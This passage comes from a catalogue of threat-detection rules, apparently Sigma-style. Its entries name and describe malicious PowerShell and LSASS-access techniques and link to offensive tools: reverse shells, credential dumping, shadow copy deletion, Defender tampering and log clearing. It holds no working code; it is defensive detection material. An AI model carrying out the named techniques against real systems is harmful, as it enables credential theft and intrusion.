https://powersploit.readthedocs.io/en/stable/Recon/README, https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon, https://thedfirreport.com/2020/10/08/ryuks-return, https://adsecurity.org/?p=2277 |
PowerShell Credential Prompt |
Detects PowerShell calling a credential prompt |
https://twitter.com/JohnLaTwC/status/850381440629981184, https://t.co/ezOTGy1a1G |
PSAsyncShell - Asynchronous TCP Reverse Shell |
Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell |
https://github.com/JoelGMSec/PSAsyncShell |
PowerShell PSAttack |
Detects the use of PSAttack PowerShell hack tool |
https://adsecurity.org/?p=2921 |
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock |
Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
PowerShell Remote Session Creation |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4 |
PowerShell Script With File Hostname Resolving Capabilities |
Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries. |
https://www.fortypoundhead.com/showcontent.asp?artid=24022, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Request A Single Ticket via PowerShell |
utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.
This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output the SPNs for the endpoint in question.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell |
Root Certificate Installed - PowerShell |
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
Suspicious Invoke-Item From Mount-DiskImage |
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps |
PowerShell Script With File Upload Capabilities |
Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md, https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4 |
PowerShell Script Change Permission Via Set-Acl - PsScript |
Detects PowerShell scripts set ACL to of a file or a folder |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md |
Powershell Sensitive File Discovery |
Detect adversaries enumerate sensitive files |
https://twitter.com/malmoeb/status/1570814999370801158 |
PowerShell Set-Acl On Windows Folder - PsScript |
Detects PowerShell scripts to set the ACL to a file in the Windows folder |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1 |
Change PowerShell Policies to an Insecure Level - PowerShell |
Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet. |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604 |
PowerShell ShellCode |
Detects Base64 encoded Shellcode |
https://twitter.com/cyb3rops/status/1063072865992523776 |
Malicious ShellIntel PowerShell Commandlets |
Detects Commandlet names from ShellIntel exploitation scripts. |
https://github.com/Shellntel/scripts/ |
Detected Windows Software Discovery - PowerShell |
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts |
Powershell Store File In Alternate Data Stream |
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md |
Potential Persistence Via Security Descriptors - ScriptBlock |
Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. |
https://github.com/HarmJ0y/DAMP |
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock |
Adversaries may attempt to find domain-level groups and permission settings.
The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Potential PowerShell Obfuscation Using Character Join |
Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation |
Internal Research |
Suspicious Eventlog Clear |
Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs |
https://twitter.com/oroneequalsone/status/1568432028361830402, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html |
Powershell Directory Enumeration |
Detects technique used by MAZE ransomware to enumerate directories using Powershell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md, https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents |
Suspicious PowerShell Download - Powershell Script |
Detects suspicious PowerShell download command |
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0 |
Powershell Execute Batch Script |
Adversaries may abuse the Windows command shell for execution.
The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script |
Troubleshooting Pack Cmdlet Execution |
Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS) |
https://twitter.com/nas_bench/status/1537919885031772161, https://lolbas-project.github.io/lolbas/Binaries/Msdt/ |
Extracting Information with PowerShell |
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.
These can be files created by users to store their own credentials, shared credential stores for a group of individuals,
configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
PowerShell Get-Process LSASS in ScriptBlock |
Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity |
https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211 |
Suspicious GetTypeFromCLSID ShellExecute |
Detects suspicious Powershell code that execute COM Objects |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object |
Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy |
Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy, https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps |
Suspicious PowerShell Get Current User |
Detects the use of PowerShell to identify the current logged user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script |
Suspicious GPO Discovery With Get-GPO |
Detect use of Get-GPO to get one GPO or all the GPOs in a domain. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps |
Suspicious Process Discovery With Get-Process |
Get the processes that are running on the local computer. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4 |
Suspicious Hyper-V Cmdlets |
Adversaries may carry out malicious operations using a virtual instance to avoid detection |
https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine |
Suspicious PowerShell Invocations - Generic |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious PowerShell Invocations - Specific |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious IO.FileStream |
Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md |
Change User Agents with WebRequest |
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols |
Potential Keylogger Activity |
Detects PowerShell scripts that contains reference to keystroke capturing functions |
https://twitter.com/ScumBots/status/1610626724257046529, https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content, https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content, https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0 |
Suspicious Get Local Groups Information - PowerShell |
Adversaries may attempt to find local system groups and permission settings.
The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Potential Suspicious PowerShell Keywords |
Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework |
https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1, https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1, https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7 |
Powershell Local Email Collection |
Adversaries may target user email on local systems to collect sensitive information.
Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md |
PowerShell Deleted Mounted Share |
Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md |
Suspicious Mount-DiskImage |
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps |
Suspicious Connection to Remote Account |
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.
Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos |
Suspicious New-PSDrive to Admin Share |
Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2 |
Suspicious TCP Tunnel Via PowerShell Script |
Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity |
https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1 |
Recon Information for Export with PowerShell |
Once established within a system or network, an adversary may use automated techniques for collecting internal data |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md |
Remove Account From Domain Admin Group |
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.
Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group |
Suspicious Service DACL Modification Via Set-Service Cmdlet - PS |
Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) |
https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 |
Suspicious Get Information for SMB Share |
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as
a precursor for Collection and to identify potential systems of interest for Lateral Movement.
Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md |
Potential PowerShell Obfuscation Using Alias Cmdlets |
Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts |
https://github.com/1337Rin/Swag-PSO |
Suspicious SSL Connection |
Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2, https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 |
Suspicious Start-Process PassThru |
Powershell use PassThru option to start in background |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Suspicious Unblock-File |
Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2 |
Powershell Suspicious Win32_PnPEntity |
Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md |
Replace Desktop Wallpaper by Powershell |
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.
This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md |
Delete Volume Shadow Copies via WMI with PowerShell - PS Script |
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell |
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script |
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html |
Suspicious PowerShell WindowStyle Option |
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.
In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md |
PowerShell Write-EventLog Usage |
Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use |
https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/ |
Zip A Folder With PowerShell For Staging In Temp - PowerShell Script |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging |
Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet |
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 |
Tamper Windows Defender - ScriptBlockLogging |
Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://bidouillesecurity.com/disable-windows-defender-in-powershell/ |
Testing Usage of Uncommonly Used Port |
Adversaries may communicate using a protocol and port paring that are typically not associated.
For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell, https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps |
Powershell Timestomp |
Adversaries may modify file time attributes to hide new or changes to existing files.
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md, https://www.offensive-security.com/metasploit-unleashed/timestomp/ |
Powershell Token Obfuscation - Powershell |
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation |
https://github.com/danielbohannon/Invoke-Obfuscation |
User Discovery And Export Via Get-ADUser Cmdlet - PowerShell |
Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ |
Potential Persistence Via PowerShell User Profile Using Add-Content |
Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md |
Abuse of Service Permissions to Hide Services Via Set-Service - PS |
Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) |
https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 |
Veeam Backup Servers Credential Dumping Script Execution |
Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials. |
https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Usage Of Web Request Commands And Cmdlets - ScriptBlock |
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs |
https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell |
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript |
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script |
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) |
PowerShell WMI Win32_Product Install MSI |
Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md |
Windows Firewall Profile Disabled |
Detects when a user disables the Windows Firewall via a Profile to help evade defense. |
https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps, https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell, https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php, http://woshub.com/manage-windows-firewall-powershell/, https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html |
Winlogon Helper DLL |
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are
used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to
load and execute malicious DLLs and/or executables.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md |
Potential WinAPI Calls Via PowerShell Scripts |
Detects use of WinAPI functions in PowerShell scripts |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Windows Defender Exclusions Added - PowerShell |
Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions |
https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html |
WMImplant Hack Tool |
Detects parameters used by WMImplant |
https://github.com/FortyNorthSecurity/WMImplant |
Powershell WMI Persistence |
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545 |
WMIC Unquoted Services Path Lookup - PowerShell |
Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts |
https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Suspicious X509Enrollment - Ps Script |
Detect use of X509Enrollment |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115 |
Powershell XML Execute Command |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests |
CMSTP Execution Process Access |
Detects various indicators of Microsoft Connection Manager Profile Installer execution |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
HackTool - CobaltStrike BOF Injection Pattern |
Detects a typical pattern of a CobaltStrike BOF which inject into other processes |
https://github.com/boku7/injectAmsiBypass, https://github.com/boku7/spawn |
HackTool - Generic Process Access |
Detects process access requests from hacktool processes based on their default image name |
https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158, https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html |
HackTool - LittleCorporal Generated Maldoc Injection |
Detects the process injection of a LittleCorporal generated Maldoc. |
https://github.com/connormcgarr/LittleCorporal |
HackTool - HandleKatz Duplicating LSASS Handle |
Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles |
https://github.com/codewhitesec/HandleKatz |
Lsass Memory Dump via Comsvcs DLL |
Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. |
https://twitter.com/shantanukhande/status/1229348874298388484, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ |
HackTool - SysmonEnte Execution |
Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon |
https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html, https://github.com/codewhitesec/SysmonEnte/, https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png |
LSASS Memory Access by Tool With Dump Keyword In Name |
Detects LSASS process access requests from a source process with the "dump" keyword in its image name. |
https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz |
Potential Credential Dumping Activity Via LSASS |
Detects process access requests to the LSASS process with specific call trace calls and access masks.
This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
|
